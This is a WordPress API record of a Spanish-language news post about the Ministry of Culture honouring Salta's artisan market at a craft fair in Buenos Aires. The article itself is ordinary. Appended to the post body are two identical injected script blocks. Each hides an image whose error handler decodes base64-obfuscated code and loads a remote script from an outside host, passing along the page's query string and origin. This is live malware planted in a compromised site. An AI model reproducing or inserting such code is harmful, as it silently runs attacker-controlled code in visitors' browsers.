{"id":3280,"date":"2023-11-13T10:56:21","date_gmt":"2023-11-13T13:56:21","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3280"},"modified":"2025-08-14T00:05:32","modified_gmt":"2025-08-14T03:05:32","slug":"en-el-centro-cultural-kirchner-el-ministerio-de-cultura-de-la-nacion-distinguio-al-mercado-artesanal-de-salta-por-su-aporte-al-sector","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3280","title":{"rendered":"En el Centro Cultural Kirchner, el Ministerio de Cultura de la Naci\u00f3n distingui\u00f3 al Mercado Artesanal de Salta por su aporte al sector"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>En el marco de la Feria Salta Artesanal por el 55\u00b0 aniversario de su creaci\u00f3n, autoridades nacionales destacaron y reconocieron a la instituci\u00f3n por la puesta en valor de las producciones artesanales con criterios de diversidad y fortalecimiento de la econom\u00eda local.<\/em><\/h4>\n\n\n\n<p>El reconocimiento se realiz\u00f3 en la Plaza Seca del Centro Cultural Kirchner, donde Asociaciones de Artesanos del Mercado Artesanal de Salta exponen y venden artesan\u00edas aut\u00e9nticas y gastronom\u00eda regional, hasta el domingo 12 de noviembre de 14 a 20 horas.<\/p>\n\n\n\n<p>En su recorrido por la Feria Salta Artesanal, el ministro de Cultura de la Naci\u00f3n,&nbsp;Trist\u00e1n Bauer, se\u00f1al\u00f3: \u201cestar muy emocionado recorriendo esta feria de artesan\u00edas, una belleza y productos tan \u00fatiles para la vida cotidiana, combinar eso por un lado y por otro, hacerlo desde el amor con esas manos que construyen con una belleza extraordinaria\u201d.<\/p>\n\n\n\n<p>\u201cAgradecerle a cada una de las Asociaciones presentes y decirles que las puertas del Ministerio de Cultura de la Naci\u00f3n est\u00e1n abiertas para todos los artesanos y artesanas de Salta\u201d, resalt\u00f3 el funcionario.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9830-feria.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9830-feria.jpg\" alt=\"Feria.\"\/><\/a><\/figure>\n\n\n\n<p>Por su parte, la directora del Mercado Artesanal de Salta,&nbsp;Yanina Lenti, acompa\u00f1ada por el jefe de programa del \u00e1rea de Desarrollo Artesanal de la Provincia,&nbsp;Mario Luna, destac\u00f3: \u201cesta distinci\u00f3n es muy emotiva para nosotros, principalmente agradecer a los artesanos que vinieron a acompa\u00f1ar\u201d, agreg\u00f3: \u201cEsta es una peque\u00f1a muestra de lo que hay en Salta, de esta manifestaci\u00f3n cultural tan importante y donde la mayor cantidad de trabajadores de la cultura de Salta est\u00e1 representada por el sector artesanal\u201d.<\/p>\n\n\n\n<p>Del acto, participaron la secretaria de Desarrollo Cultural de la Naci\u00f3n,&nbsp;Lucrecia Cardoso; el director Nacional de Industrias Culturales,&nbsp;Luis Sanjurjo; la directora del Mercado Nacional de Artesan\u00edas Tradicionales e Innovadoras Argentinas MATRIA,&nbsp;Roxana Amarilla&nbsp;y el presidente del Instituto Movilizador de Fondos Cooperativos,&nbsp;Juan Carlos Junio.<\/p>\n\n\n\n<p><strong>Sobre la Feria Salta Artesanal<\/strong><\/p>\n\n\n\n<p>Participan artesanos y artesanas de la Asociaci\u00f3n de Artesanos Caykus; Asociaci\u00f3n Artesanos de la Estaci\u00f3n; Asociaci\u00f3n Centro de Artesanos Salte\u00f1os; Asociaci\u00f3n Llajtay Manta; Comunidades Coyas Unidos: Asociaci\u00f3n Civil de Artesan\u00edas Ind\u00edgenas; Asociaci\u00f3n de Artesanos Turu Yaco; Asociaci\u00f3n de Artesanos Caimanta; Emprendedores del Norte; Cooperativa de Productores Vitivin\u00edcolas Cafayate Valles Calchaqu\u00edes Limitada y Asociaci\u00f3n Cultura y Tradici\u00f3n Alimentaria Salte\u00f1a, todas pertenecientes al Mercado Artesanal de Salta.<\/p>\n\n\n\n<p>Los visitantes encontrar\u00e1n cuchillos, textiles en fibra de llama y lana de oveja, textiles de chaguar, objetos de fieltro, joyer\u00eda en alpaca y piedra, objetos de alpaca y madera, orfebrer\u00eda, cer\u00e1mica, herrer\u00eda, cester\u00eda en simbol, objetos lapidados de piedra \u00f3nix, utensilios de madera pacar\u00e1 y otras producciones artesanales que dan cuenta de la diversidad de materias primas y pr\u00e1cticas art\u00edsticas artesanales. Tambi\u00e9n se exhibir\u00e1n y vender\u00e1n producciones gastron\u00f3micas y vinos.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9831-feria.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9831-feria.jpg\" alt=\"Feria.\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/en-el-centro-cultural-kirchner-el-ministerio-de-cultura-de-la-nacion-distinguio-al-mercado-artesanal-de-salta-por-su-aporte-al-sector-92853\" target=\"_blank\" rel=\"noopener\" title=\"Secretar\u00eda de Prensa y Comunicaci\u00f3n\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco de la Feria Salta Artesanal por el 55\u00b0 aniversario de su creaci\u00f3n, autoridades nacionales destacaron y reconocieron a la instituci\u00f3n por la puesta en valor de las producciones artesanales con criterios de diversidad y fortalecimiento de la econom\u00eda local. El reconocimiento se realiz\u00f3 en la Plaza Seca del Centro Cultural Kirchner, donde [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3281,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-3280","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3280"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3280"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3280\/revisions"}],"predecessor-version":[{"id":6922,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3280\/revisions\/6922"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3281"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3280"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3280"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3280"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}